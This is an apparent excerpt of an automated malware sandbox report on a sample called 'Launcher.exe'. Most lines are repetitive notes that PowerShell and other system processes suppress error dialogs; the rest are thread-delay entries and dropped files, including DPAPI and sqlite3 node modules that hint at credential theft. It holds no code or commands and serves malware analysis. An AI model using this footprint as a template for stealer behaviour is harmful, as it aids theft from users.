          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\tasklist.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\taskkill.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\taskkill.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7804
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2021
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1131
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8148
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2452
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4698
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1764
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6436
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1224
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2812
          Source: C:\Users\user\Desktop\Launcher.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg\0de74a34d95a30eed84cdf31f0dc5868c59b7977d3d496845c9363812235b768\@primno\dpapi\prebuilds\win32-x64\node.napi.node
          Source: C:\Users\user\Desktop\Launcher.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\0a5bipl0\0a5bipl0.dll
          Source: C:\Users\user\Desktop\Launcher.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node.bak
          Source: C:\Users\user\Desktop\Launcher.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg-Ztzknl\59b07c111ff3cdb6a2d6d93c23513b9ec89195f53f0a55a3a7769a9f164e6041
          Source: C:\Users\user\Desktop\Launcher.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pkg-Ztzknl\b9a7b76665d92af2d90cc6a15ffdc1a79635559cbc1c40bd1f83c4c4449cd442
